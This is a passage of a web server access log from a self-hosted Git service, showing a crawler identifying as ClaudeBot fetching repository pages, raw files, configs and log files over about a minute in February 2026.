+claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" [Client 216.73.216.188] [Length 10405] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 48131] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2?display=source" [Client 216.73.216.188] [Length 31305] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 24060] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 216.73.216.188] [Length 11206] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9954] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log?display=source" [Client 216.73.216.188] [Length 27660] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 10307] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 10304] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 10165] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 11167] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16491] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13953] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16093] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11060] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13901] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 216.73.216.188] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14219] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9962] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11540] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 13017] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2FDockerfile" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 9938] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 10747] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14681] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11575] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 14181] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf?display=source" [Client 216.73.216.188] [Length 12989] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 12999] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 216.73.216.188] [Length 10969] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html?display=source" [Client 216.73.216.188] [Length 22734] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21830] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 216.73.216.188] [Length 10965] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11569] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14516] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html?display=source" [Client 216.73.216.188] [Length 22746] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11589] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9958] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log?display=source" [Client 216.73.216.188] [Length 20870] [Gzip 9.92] [Sent-to 